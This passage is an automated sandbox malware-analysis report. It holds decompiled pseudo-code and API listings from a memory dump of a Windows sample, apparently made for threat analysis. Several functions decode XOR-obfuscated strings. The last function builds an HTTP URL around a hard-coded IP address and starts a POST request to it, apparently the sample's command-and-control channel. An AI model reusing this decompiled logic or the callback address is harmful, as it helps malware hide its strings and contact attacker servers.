0x012d0fc0
0x012d0fc3
0x012d0fcc
0x012d0fd9
0x012d0fe8
0x012d0ff6
0x012d0ff7
0x012d0ffc
0x012d1012
0x012d1014
0x012d1017
0x012d1019
0x012d101a
0x012d101d
0x012d101e
0x012d1021
0x012d1024
0x012d1027
0x012d1028
0x012d1029
0x012d102f
0x012d1038
0x012d1039
0x012d1042
0x012d1043
0x012d104e
0x012d1055
0x012d1055
0x012d1017
0x012d0f14
0x012d0f14
0x012d0f1a
0x012d0f20
0x012d0f27
0x012d0f39
0x012d0f3c
0x012d0f50
0x012d0f55
0x012d0f57
0x012d0f58
0x012d0f59
0x012d0f5a
0x012d0f5b
0x012d0f5c
0x012d0f61
0x012d0f64
0x012d0f66
0x012d0f6d
0x012d0f6e
0x012d0f71
0x012d0f74
0x012d0f75
0x012d0f76
0x012d0f7c
0x012d0f7c
0x012d0f85
0x012d0f8a
0x012d0f8a
0x012d0f8e
0x012d0f93
0x012d0f0e
0x012d1066
0x012d106b

APIs

CloseHandle.KERNEL32(?), ref: 012D0F3C
CloseHandle.KERNEL32(00000000), ref: 012D0F7C
CloseHandle.KERNEL32(?), ref: 012D0FCC
CloseHandle.KERNEL32(00000000), ref: 012D102F

Part of subcall function 012D1F7B: SendMessageW.USER32(00000402,00000000,00000000,00000000), ref: 012D212D

ExitProcess.KERNEL32 ref: 012D1055
CloseHandle.KERNEL32(?), ref: 012D105E

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012C28CC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129

C-Code - Quality: 92%

			E012C28CC(void* __ecx, void* __esi) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1288;
				char _v1301;
				signed char _v1302;
				char _v1308;
				char _v1312;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t66;
				char* _t71;
				char _t73;
				signed char _t74;
				signed int _t84;
				void* _t89;
				signed char* _t91;
				signed int _t93;
				signed char _t96;
				char _t97;
				signed int _t98;
				void* _t102;
				signed int _t103;
				void* _t104;

				_t102 = __esi;
				_t66 =  *0x12e2aa8; // 0x5ff9d198
				_v8 = _t66 ^ _t103;
				_push( &_v1308);
				_push( *((intOrPtr*)(__esi + 4)));
				_push(__ecx);
				if(E012EB5AB( &_v1308) == 0) {
					_v1312 = 0xffffff9f;
					_t93 = 0;
					_t49 =  &_v1312;
					 *_t49 = _v1312 - __esi + 0x11d;
					__eflags =  *_t49;
					do {
						_t71 = _t102 + _t93 + 0x11d;
						_t99 = _v1312 + _t71;
						_t54 = _t99 + 0x20; // 0xffffffbf
						_t90 = _t54;
						__eflags = _t54 - 0x19;
						if(_t54 > 0x19) {
							__eflags = _t99 - 0x19;
							if(_t99 > 0x19) {
								 *_t71 = 0;
							} else {
								_t60 = _t102 + _t93 + 0x1d;
								 *_t60 =  *(_t102 + _t93 + 0x1d) | 0x00000020;
								__eflags =  *_t60;
								_t64 = _t93 - 0x20; // -32
								_t99 = _t64;
								goto L22;
							}
						} else {
							 *(_t102 + _t93 + 0x1d) =  *(_t102 + _t93 + 0x1d) | 0x00000010;
							_t59 = _t93 + 0x20; // 0x20
							_t99 = _t59;
							L22:
							 *_t71 = _t99;
						}
						_t93 = _t93 + 1;
						__eflags = _t93 - 0x100;
					} while (_t93 < 0x100);
				} else {
					_t73 = 0;
					do {
						 *((char*)(_t103 + _t73 - 0x104)) = _t73;
						_t73 = _t73 + 1;
					} while (_t73 < 0x100);
					_t74 = _v1302;
					_v264 = 0x20;
					if(_t74 != 0) {
						_t91 =  &_v1301;
						do {
							_t98 = _t74 & 0x000000ff;
							_t85 =  *_t91 & 0x000000ff;
							if(_t98 <= ( *_t91 & 0x000000ff)) {
								_t99 = _t103 + _t98 - 0x104;
								E012C8BA0(_t103 + _t98 - 0x104, 0x20, _t85 - _t98 + 1);
								_t104 = _t104 + 0xc;
							}
							_t74 = _t91[1];
							_t91 =  &(_t91[2]);
							_t113 = _t74;
						} while (_t74 != 0);
					}
					E012C8F4E(_t89, _t99, _t113, 0, 1,  &_v264, 0x100,  &_v1288,  *((intOrPtr*)(_t102 + 4)),  *((intOrPtr*)(_t102 + 0xc)), 0);
					_t90 = 0;
					E012C8E21(0, _t113, 0,  *((intOrPtr*)(_t102 + 0xc)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *((intOrPtr*)(_t102 + 4)), 0);
					E012C8E21(0, _t113, 0,  *((intOrPtr*)(_t102 + 0xc)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *((intOrPtr*)(_t102 + 4)), 0);
					_t84 = 0;
					do {
						_t96 =  *(_t103 + _t84 * 2 - 0x504) & 0x0000ffff;
						if((_t96 & 0x00000001) == 0) {
							__eflags = _t96 & 0x00000002;
							if((_t96 & 0x00000002) == 0) {
								 *((char*)(_t102 + _t84 + 0x11d)) = _t90;
							} else {
								_t37 = _t102 + _t84 + 0x1d;
								 *_t37 =  *(_t102 + _t84 + 0x1d) | 0x00000020;
								__eflags =  *_t37;
								_t97 =  *((intOrPtr*)(_t103 + _t84 - 0x304));
								goto L13;
							}
						} else {
							 *(_t102 + _t84 + 0x1d) =  *(_t102 + _t84 + 0x1d) | 0x00000010;
							_t97 =  *((intOrPtr*)(_t103 + _t84 - 0x204));
							L13:
							 *((char*)(_t102 + _t84 + 0x11d)) = _t97;
						}
						_t84 = _t84 + 1;
					} while (_t84 < 0x100);
				}
				return E012C8B82(_t71, _t90, _v8 ^ _t103, _t99, 0x100, _t102);
			}

0x012c28cc
0x012c28d7
0x012c28de
0x012c28e9
0x012c28ea
0x012c28ed
0x012c28fa
0x012c2a02
0x012c2a0c
0x012c2a0e
0x012c2a0e
0x012c2a0e
0x012c2a14
0x012c2a1a
0x012c2a21
0x012c2a23
0x012c2a23
0x012c2a26
0x012c2a29
0x012c2a35
0x012c2a38
0x012c2a46
0x012c2a3a
0x012c2a3a
0x012c2a3a
0x012c2a3a
0x012c2a3f
0x012c2a3f
0x00000000
0x012c2a3f
0x012c2a2b
0x012c2a2b
0x012c2a30
0x012c2a30
0x012c2a42
0x012c2a42
0x012c2a42
0x012c2a49
0x012c2a4a
0x012c2a4a
0x012c2900
0x012c2900
0x012c2902
0x012c2902
0x012c2909
0x012c290a
0x012c290e
0x012c2914
0x012c291d
0x012c291f
0x012c2925
0x012c2925
0x012c2928
0x012c292d
0x012c2933
0x012c293d
0x012c2942
0x012c2942
0x012c2945
0x012c2948
0x012c294b
0x012c294b
0x012c2925
0x012c296a
0x012c296f
0x012c298a
0x012c29af
0x012c29b7
0x012c29b9
0x012c29b9
0x012c29c4
0x012c29d4
0x012c29d7
0x012c29ee
0x012c29d9
0x012c29d9
0x012c29d9
0x012c29d9
0x012c29de
0x00000000
0x012c29de
0x012c29c6
0x012c29c6
0x012c29cb
0x012c29e5
0x012c29e5
0x012c29e5
0x012c29f5
0x012c29f6
0x012c29fa
0x012c2a5b

APIs

___crtGetStringTypeA.LIBCMT ref: 012C296A
___crtLCMapStringA.LIBCMT ref: 012C298A
___crtLCMapStringA.LIBCMT ref: 012C29AF

Strings

, xrefs: 012C2914

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D2F9F, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126
library

C-Code - Quality: 73%

			E012D2F9F(signed int __eax, void* __ebx, void* __edx, void* __esi, void* __ebp, int _a4, char _a10, struct HINSTANCE__* _a12, int _a16, signed int _a24, signed int _a28, signed int _a32, int _a36, signed int _a40, void* _a44, char _a48, signed int _a52, void* _a56, short _a60, short _a62, signed int _a64, int _a68, char _a100, intOrPtr _a108, intOrPtr _a112, signed int _a116, void* _a120, signed int _a128) {
				char _v0;
				intOrPtr _v12;
				int _v16;
				void* __edi;
				signed int _t52;

				_a40 = __eax;
				_t52 = E012D28CC(__ebx, __esi);
				_a64 = _t52;
				if(_t52 == 0) {
					_push(_a16);
					return E0135D6CD(_t52);
				}
				_push(0);
				_push(__ebp);
				__eax = E012F3F0D(__eax, __esi);
				_a4 = __eax;
				_a108 = 0x3c;
				_push(__edi);
				__eax = E012E968F(__eax);
				__esi = __eax;
				_push(__ebx);
				__eflags = __eax - 4;
				if(__eflags != 0) {
					L5:
					__eax =  &_a100;
					_push(__eax);
					_push(__esi);
					_push(__edx);
					__eax = E012EB0D2(__eax, __ebx, __edx, __eflags);
					__eflags = __eax;
					if(__eax != 0) {
						__ecx = 0;
						__eax = 0;
						__edx = __ebx;
						_a108 = 0;
						_a112 = 0;
						_a116 = __edx;
						_a120 = __edi;
						__eax =  ~0x00000000;
						__eflags = _a128 & 0x00400000;
						_a40 =  ~0x00000000;
						if(__eflags == 0) {
							__ecx =  ~0x00000000;
							_t31 =  &_a32;
							 *_t31 = _a32 & 0x00000000;
							__eflags =  *_t31;
							_a28 =  ~0x00000000;
							_a24 = __ebx;
						} else {
							__eax = __ebx - 1;
							_a32 = __ebx - 1;
							__edx = __edx - __ebx;
							__ebx =  ~__ebx;
							_a28 = __edx;
							_a24 =  ~__ebx;
						}
						__esi = __edi * __ebx << 2;
						__eax = E012CC795(__edx, __edi * __ebx << 2, __eflags);
						__ecx = 0;
						_a16 = __eax;
						__eflags = __eax;
						if(__eax != 0) {
							__eax = 0;
							__ecx = 0xa;
							__edi =  &_a48;
							__eax = memset(__edi, 0, 0 << 2);
							__edi = __edi + __ecx;
							__ecx = 0;
							__edi = _a44;
							_a64 = _a64 & 0x00000000;
							__eax = __eax + 1;
							_a60 = __ax;
							__eax = 0x10;
							_a62 = __ax;
							__edi = __edi * __ebx;
							__eax = __edi * __ebx + __edi * __ebx;
							__eflags = __eax;
							_push(0);
							_a48 = 0x28;
							_a52 = __ebx;
							_a56 = __edi;
							_a68 = __eax;
							return __eax;
						}
						__eflags = _a36;
						if(_a36 == 0) {
							__eflags = _v16;
							if(__eflags != 0) {
								_push(_v16);
								_push(_v12);
								goto L16;
							}
						} else {
							__eflags = _v16;
							if(_v16 != 0) {
								_push(_v16);
								_push(0);
								L16:
								_push(__eax);
								__eax = E0137A3C2(__ebx);
							}
						}
					} else {
						__eflags = _a10 - __al;
						if(_a10 == __al) {
							do {
								 *(__esp + __eax + 0x1c) =  *(__esp + __eax + 0x1c) ^ 0x00000007;
								__eax = __eax + 1;
								__eflags = __eax - 0xa;
							} while (__eax < 0xa);
							_a10 = 1;
						}
						__eax =  &_v0;
						__eax = GetProcAddress(_a12,  &_v0);
						__eflags = _v16;
						if(_v16 != 0) {
							__eax =  *__eax(0, _v16);
						}
					}
				} else {
					__eflags = E012CF5EF(__ebx, __edi, __esi) - 0xc;
					if(__eflags > 0) {
						__eax = CloseHandle(4);
						goto L5;
					}
				}
				return 0;
			}

0x012d2f9f
0x012d2fa3
0x012d2fa8
0x012d2fae
0x012d3062
0x00000000
0x012d3066
0x012d2fb4
0x012d2fb6
0x012d2fb7
0x012d2fbc
0x012d2fc0
0x012d2fc8
0x012d2fc9
0x012d2fce
0x012d2fd0
0x012d2fd6
0x012d2fd9
0x012d2ff1
0x012d2ff1
0x012d2ff5
0x012d2ff6
0x012d2ff7
0x012d2ff8
0x012d2ffd
0x012d2fff
0x012d303e
0x012d3040
0x012d3042
0x012d3044
0x012d304b
0x012d3052
0x012d3059
0x012d30de
0x012d30e0
0x012d30eb
0x012d30ef
0x012d3108
0x012d310a
0x012d310a
0x012d310a
0x012d310f
0x012d3113
0x012d30f1
0x012d30f1
0x012d30f4
0x012d30f8
0x012d30fc
0x012d30fe
0x012d3102
0x012d3102
0x012d311c
0x012d311f
0x012d3124
0x012d3126
0x012d312a
0x012d312c
0x012d3153
0x012d3155
0x012d3156
0x012d315a
0x012d315a
0x012d315a
0x012d315c
0x012d3160
0x012d3165
0x012d3166
0x012d316d
0x012d316e
0x012d3175
0x012d3178
0x012d3178
0x012d317a
0x012d317c
0x012d3184
0x012d3188
0x012d318c
0x00000000
0x012d3190
0x012d312e
0x012d3132
0x012d3148
0x012d30b0
0x012d30b6
0x012d30ba
0x00000000
0x012d30ba
0x012d3134
0x012d3134
0x012d3138
0x012d313e
0x012d3142
0x012d30be
0x012d30be
0x012d30bf
0x012d30bf
0x012d3138
0x012d3001
0x012d3001
0x012d3005
0x012d3007
0x012d3007
0x012d300c
0x012d300d
0x012d300d
0x012d3012
0x012d3012
0x012d3017
0x012d3020
0x012d3026
0x012d302b
0x012d3037
0x012d3037
0x012d302b
0x012d2fdb
0x012d2fe0
0x012d2fe3
0x012d2feb
0x00000000
0x012d2feb
0x012d2fe3
0x012d3286

APIs

CloseHandle.KERNEL32(00000004), ref: 012D2FEB
GetProcAddress.KERNEL32(?,?,?,00000000,0000003C), ref: 012D3020

Strings

(, xrefs: 012D317C
<, xrefs: 012D2FC0

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012D1520, Relevance: 6.5, APIs: 5, Instructions: 201
sleep

C-Code - Quality: 57%

			E012D1520(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
				long _v12;
				char _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				signed int _t48;
				signed int _t56;
				void* _t58;
				void* _t60;
				int _t62;
				void* _t63;
				intOrPtr _t66;
				void* _t67;
				intOrPtr _t69;
				signed int _t81;
				signed int _t90;
				void* _t96;
				void* _t97;

				_t91 = __esi;
				_t84 = __edx;
				_t71 = __ebx;
				_t96 = _t97;
				_t41 = _a8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				if(_t41 != 1) {
					__eflags = _t41 - 0xf;
					if(_t41 == 0xf) {
						L39:
						_push(_a16);
						_push(_a12);
						_push(_a8);
						_push(_a4);
						return E012F6584(_t41);
					}
					__eflags = _t41 - 5;
					if(_t41 == 5) {
						goto L39;
					}
					__eflags = _t41 - 2;
					if(_t41 == 2) {
						goto L39;
					}
					__eflags = _t41 - 0x10;
					if(_t41 == 0x10) {
						_push(0);
						_push(1);
						_t41 = E01329419(_t41, 1);
						goto L39;
					}
					__eflags = _t41 - 0x12;
					if(_t41 == 0x12) {
						_t66 =  *0x12e59a8; // 0x3cb070
						_t67 =  *(_t66 + 8);
						__eflags = _t67 - 0xffffffff;
						if(__eflags != 0) {
							CloseHandle(_t67);
							_t69 =  *0x12e59a8; // 0x3cb070
							 *(_t69 + 8) =  *(_t69 + 8) | 0xffffffff;
						}
						L11:
						_push(0);
						_t41 = E012D089D(_t71, 1, _t91, __eflags);
						goto L39;
					}
					__eflags = _t41 - 0x16;
					if(__eflags == 0) {
						goto L11;
					}
					__eflags = _t41 - 0x400;
					if(_t41 == 0x400) {
						_push(0);
						_push(0);
						_push(0);
						_push(E012D87B6);
						_push(0);
						_push(0);
						_push(__ecx);
						 *0x12e2f08 = _t41;
						goto L39;
					}
					__eflags = _t41 - 0x463;
					if(_t41 != 0x463) {
						__eflags = _t41 - 0x401;
						if(_t41 != 0x401) {
							__eflags = _t41 - 0x402;
							if(__eflags == 0) {
								_push(__edx);
								_t41 = E013322C5(_t41, __edx, 1, __eflags);
								__eflags = _t41 - 4;
								if(_t41 != 4) {
									goto L39;
								}
								_v16 = 0x16a;
								_v18 = 0x14b;
								_v20 = 0x11e;
								_v22 = 0x118;
								_v24 = 0x10f;
								_v26 = 0x106;
								_v28 = 0x12b;
								_v14 = 0;
								_t56 = 0;
								__eflags = 0;
								do {
									 *(_t96 + _t56 * 2 - 0x18) =  *(_t96 + _t56 * 2 - 0x18) ^ 0x0000016a;
									_t56 = _t56 + 1;
									__eflags = _t56 - 7;
								} while (_t56 < 7);
								_push(0);
								_push( &_v28);
								_push(0x12e06d0);
								_push(0);
								_v14 = 1;
								_push(0);
								_t41 = E01308713( &_v28, 0);
								goto L39;
							}
							__eflags = _t41 - 0x403;
							if(_t41 == 0x403) {
								_t48 = _a16;
								asm("cdq");
								_t81 = 0x32;
								_t41 = _t48 / _t81;
								_v12 = _t48 % _t81;
								_t90 = _t48 / _t81;
								while(1) {
									__eflags = _t90;
									if(_t90 == 0) {
										break;
									}
									_t90 = _t90 - 1;
									__eflags = _t90;
									Sleep(0x32);
								}
								Sleep(_v12);
								goto L39;
							}
							__eflags = _t41 - 0x404;
							if(_t41 == 0x404) {
								goto L39;
							}
							__eflags = _t41 - 0x464;
							if(_t41 == 0x464) {
								_push( &_v12);
								_push(0);
								_push(0);
								_push(E012D0BAF);
								_push(0);
								_push(0);
								_push(_t96);
								_t41 = E0130E834( &_v12, 0, __ecx);
								goto L39;
							}
							__eflags = _t41 - 0x405;
							if(_t41 != 0x405) {
								__eflags = _t41 - 0x4a;
								if(_t41 != 0x4a) {
									goto L39;
								}
								__eflags =  *_a16 - 1;
								if( *_a16 != 1) {
									goto L39;
								}
								_push( &_v28);
								return E012E71C0( &_v28, __edx, 1);
							}
							_push( &_v12);
							__eflags = 0;
							_push(0);
							_push(0);
							_push(E012D089D);
							_push(0);
							_push(0);
							return E013499C7( &_v12);
						} else {
							_push(0x10);
							__eflags = 0;
							_push(0);
							_push(__ecx);
							_t58 = E0130D45A(_t41);
							_push(0x12e59b4);
							_push(0);
							_push(_t58);
							_push(E012D125F);
							_push(0);
							_push(0);
							return E0130A17E(_t58);
						}
					} else {
						_t60 =  *0x12e2f0c; // 0xb8
						_v12 = 0;
						__eflags = _t60 - 0xffffffff;
						if(__eflags == 0) {
							CloseHandle( *0x12e2f0c);
							_t62 = CloseHandle( *0x12e2f10);
							_push(0);
							_push(0);
							_push(1);
							_push(0);
							_push(0);
							_t63 = E0130C977(_t62, 0, __eflags);
							_push( &_v12);
							_push(0);
							_push(_t63);
							_push(E012CFF4D);
							_push(0);
							_push(0);
							 *0x12e2f0c = _t63;
							return E0130D5F1(_t63, _t84, 1);
						} else {
							_push(_t60);
							return E01357129(_t60, __ecx, __edx);
						}
					}
				} else {
					return E013138ED(_t41, __ebx, 1);
				}
				goto L41;
			}

0x012d1520
0x012d1520
0x012d1520
0x012d1521
0x012d1523
0x012d1529
0x012d152a
0x012d152b
0x012d1531
0x012d1583
0x012d1586
0x012d1810
0x012d1810
0x012d1813
0x012d1816
0x012d1819
0x00000000
0x012d181c
0x012d158c
0x012d158f
0x00000000
0x00000000
0x012d1595
0x012d1598
0x00000000
0x00000000
0x012d159e
0x012d15a1
0x012d15a3
0x012d15a5
0x012d15a6
0x00000000
0x012d15a6
0x012d15b0
0x012d15b3
0x012d15b5
0x012d15ba
0x012d15bd
0x012d15c0
0x012d15c3
0x012d15c9
0x012d15ce
0x012d15ce
0x012d15d9
0x012d15d9
0x012d15db
0x00000000
0x012d15db
0x012d15d4
0x012d15d7
0x00000000
0x00000000
0x012d15e5
0x012d15ea
0x012d15ee
0x012d15ef
0x012d15f0
0x012d15f1
0x012d15f6
0x012d15f7
0x012d15f8
0x012d15fe
0x00000000
0x012d15fe
0x012d1608
0x012d160d
0x012d1678
0x012d167d
0x012d16a8
0x012d16ad
0x012d16af
0x012d16b0
0x012d16b5
0x012d16b8
0x00000000
0x00000000
0x012d16c5
0x012d16cc
0x012d16d3
0x012d16da
0x012d16e1
0x012d16e8
0x012d16f1
0x012d16f5
0x012d16f8
0x012d16f8
0x012d16fa
0x012d16fc
0x012d1701
0x012d1702
0x012d1702
0x012d1707
0x012d170b
0x012d170c
0x012d1711
0x012d1712
0x012d1716
0x012d1717
0x00000000
0x012d1717
0x012d1721
0x012d1726
0x012d1728
0x012d172d
0x012d172e
0x012d172f
0x012d1739
0x012d173c
0x012d1745
0x012d1745
0x012d1747
0x00000000
0x00000000
0x012d1742
0x012d1742
0x012d1743
0x012d1743
0x012d174c
0x00000000
0x012d174c
0x012d1758
0x012d175a
0x00000000
0x00000000
0x012d1760
0x012d1765
0x012d176c
0x012d176d
0x012d176e
0x012d176f
0x012d1774
0x012d1775
0x012d1776
0x012d1777
0x00000000
0x012d1777
0x012d1781
0x012d1786
0x012d17a6
0x012d17a9
0x00000000
0x00000000
0x012d17ae
0x012d17b0
0x00000000
0x00000000
0x012d17b5
0x00000000
0x012d17b6
0x012d178b
0x012d178c
0x012d178e
0x012d178f
0x012d1790
0x012d1795
0x012d1796
0x012d179c
0x012d167f
0x012d167f
0x012d1681
0x012d1683
0x012d1684
0x012d1685
0x012d168a
0x012d168f
0x012d1690
0x012d1691
0x012d1696
0x012d1697
0x012d169d
0x012d169d
0x012d160f
0x012d160f
0x012d1616
0x012d1619
0x012d161c
0x012d1642
0x012d164a
0x012d164c
0x012d164d
0x012d164e
0x012d164f
0x012d1650
0x012d1651
0x012d1659
0x012d165a
0x012d165b
0x012d165c
0x012d1661
0x012d1662
0x012d1663
0x012d166d
0x012d161e
0x012d161e
0x012d1624
0x012d1624
0x012d161c
0x012d1533
0x012d1538
0x012d1538
0x00000000

APIs

CloseHandle.KERNEL32(?), ref: 012D15C3
CloseHandle.KERNEL32 ref: 012D1642
CloseHandle.KERNEL32 ref: 012D164A
Sleep.KERNEL32(00000032), ref: 012D1743
Sleep.KERNEL32(?), ref: 012D174C

Memory Dump Source

Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd

Function 012CC931, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 449

C-Code - Quality: 87%

			E012CC931(void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				char _v72;
				char _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				intOrPtr _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				intOrPtr _v108;
				short _v110;
				short _v112;
				short _v114;
				short _v116;
				short _v118;
				short _v120;
				short _v122;
				short _v124;
				short _v126;
				short _v128;
				short _v130;
				short _v132;
				short _v134;
				short _v136;
				short _v138;
				short _v140;
				intOrPtr _v144;
				short _v146;
				short _v148;
				short _v150;
				short _v152;
				short _v154;
				short _v156;
				short _v158;
				short _v160;
				short _v162;
				short _v164;
				short _v166;
				short _v168;
				short _v170;
				short _v172;
				short _v174;
				short _v176;
				short _v178;
				short _v180;
				short _v182;
				short _v184;
				short _v186;
				short _v188;
				short _v190;
				short _v192;
				short _v194;
				short _v196;
				short _v198;
				short _v200;
				short _v202;
				short _v204;
				short _v206;
				short _v208;
				short _v210;
				short _v212;
				short _v214;
				intOrPtr _v218;
				short _v220;
				short _v222;
				short _v224;
				short _v226;
				short _v228;
				short _v230;
				short _v232;
				short _v234;
				short _v236;
				short _v238;
				short _v240;
				short _v242;
				short _v244;
				short _v246;
				short _v248;
				short _v250;
				short _v252;
				short _v254;
				short _v256;
				short _v258;
				intOrPtr _v262;
				intOrPtr _v266;
				short _v268;
				short _v270;
				short _v272;
				short _v274;
				intOrPtr _v278;
				intOrPtr _v282;
				char _v284;
				signed int _v288;
				char _v292;
				char _v304;
				intOrPtr _v312;
				char _v316;
				char _v320;
				char _v836;
				char _v1348;
				void* __edi;
				void* __esi;
				short _t202;
				short _t203;
				short _t204;
				short _t205;
				short _t206;
				short _t207;
				short _t208;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				intOrPtr _t246;
				intOrPtr _t247;
				intOrPtr _t249;
				intOrPtr _t253;
				intOrPtr _t255;
				char _t256;
				intOrPtr _t258;
				char* _t261;
				intOrPtr _t270;
				intOrPtr _t275;
				intOrPtr _t277;
				short _t323;
				short _t324;
				short _t325;
				short _t326;
				void* _t335;
				void* _t336;
				intOrPtr _t387;

				_t336 = __edx;
				_t202 = 0x68;
				_v72 = _t202;
				_t203 = 0x74;
				_v288 = _v288 & 0x00000000;
				_v70 = _t203;
				_v68 = _t203;
				_t204 = 0x70;
				_v66 = _t204;
				_t205 = 0x3a;
				_v64 = _t205;
				_t206 = 0x2f;
				_v62 = _t206;
				_v60 = _t206;
				_t207 = 0x25;
				_v58 = _t207;
				_t208 = 0x53;
				_v56 = _t208;
				_v54 = 0;
				_v292 = L"*/*";
				E012C1000(0x200, L"%S", "192.243.101.124");
				E012C1000(0x200,  &_v72, "192.243.101.124");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if( *0x12e5968 != 0) {
					L4:
					_v84 = 0x8c;
					_v86 = 0xba;
					_v96 = 0xb9;
					_v98 = 0xa3;
					_v100 = 0xe5;
					_v88 = 0xbf;
					_v102 = 0xfe;
					_v90 = 0xbf;
					_v104 = 0xed;
					_v110 = 0xdf;
					_v112 = 0xac;
					_v114 = 0xbc;
					_v116 = 0xbf;
					_v118 = 0xb4;
					_v124 = 0xbe;
					_v126 = 0xbf;
					_v128 = 0xbc;
					_v130 = 0xbf;
					_v146 = 0xe4;
					_v132 = 0xbd;
					_v148 = 0xcf;
					_v120 = 0xbe;
					_v122 = 0xbe;
					_v134 = 0xb8;
					_v150 = 0xac;
					_v136 = 0xa3;
					_v138 = 0xe9;
					_v152 = 0xa5;
					_v140 = 0xe1;
					_v154 = 0xe3;
					_v156 = 0xe7;
					_v158 = 0xef;
					_v160 = 0xe9;
					_v162 = 0xcb;
					_v164 = 0xac;
					_v94 = 0xbb00bf;
					_v108 = 0xea00ed;
					_v144 = 0xe300fe;
					_v166 = 0xe9;
					_v168 = 0xe7;
					_v170 = 0xe5;
					_v172 = 0xe0;
					_v174 = 0xac;
					_v176 = 0xa0;
					_v178 = 0xc0;
					_v180 = 0xc1;
					_v182 = 0xd8;
					_v184 = 0xc4;
					_v186 = 0xc7;
					_v188 = 0xa4;
					_v190 = 0xac;
					_v192 = 0xba;
					_v194 = 0xbf;
					_v196 = 0xbf;
					_v198 = 0xbb;
					_v200 = 0xbf;
					_v202 = 0xb9;
					_v204 = 0xa3;
					_v206 = 0xf8;
					_v208 = 0xe5;
					_v210 = 0xc7;
					_v212 = 0xee;
					_v220 = 0xe0;
					_v224 = 0xfc;
					_v214 = 0xe9;
					_v226 = 0xcd;
					_v228 = 0xac;
					_v230 = 0xa5;
					_v232 = 0xbd;
					_v234 = 0xa2;
					_v236 = 0xba;
					_v238 = 0xac;
					_v240 = 0xd8;
					_v242 = 0xc2;
					_v244 = 0xac;
					_v246 = 0xff;
					_v248 = 0xfb;
					_v218 = 0xdb00e9;
					_v222 = 0xfc;
					_v250 = 0xe3;
					_v252 = 0xe8;
					_v268 = 0xb9;
					_v254 = 0xe2;
					_v270 = 0xa3;
					_v256 = 0xe5;
					_v272 = 0xed;
					_v258 = 0xdb;
					_v274 = 0xe0;
					_v284 = 0xc1;
					_t387 = 1;
					_v262 = 0xa400ac;
					_v266 = 0xbc00a2;
					_v278 = 0xe000e5;
					_v282 = 0xf600e3;
					_v82 = 0;
					_t234 =  *0x12e5968; // 0x0
					_t235 =  *((intOrPtr*)(_t234 + 0x18))(E012C113A( &_v284), 1, 0, 0, 0);
					 *0x12e59c0 = _t235;
					if(_t235 == 0) {
						L20:
						 *_a8 = 0x50;
						if(E012CC8AE(_a4, "192.243.101.124") == 0) {
							L3:
							return 0;
						}
						E012C1000(0x200, L"%S", _a4);
						L22:
						_t243 =  *0x12e5968; // 0x0
						_t244 =  *((intOrPtr*)(_t243 + 0x14))( *0x12e59c0,  &_v1348, 0x50, 0);
						 *0x12e59c4 = _t244;
						if(_t244 == 0) {
							goto L3;
						}
						_t323 = 0x50;
						_v28 = _t323;
						_t324 = 0x4f;
						_v26 = _t324;
						_t325 = 0x53;
						_v24 = _t325;
						_t326 = 0x54;
						_v22 = _t326;
						_v20 = 0;
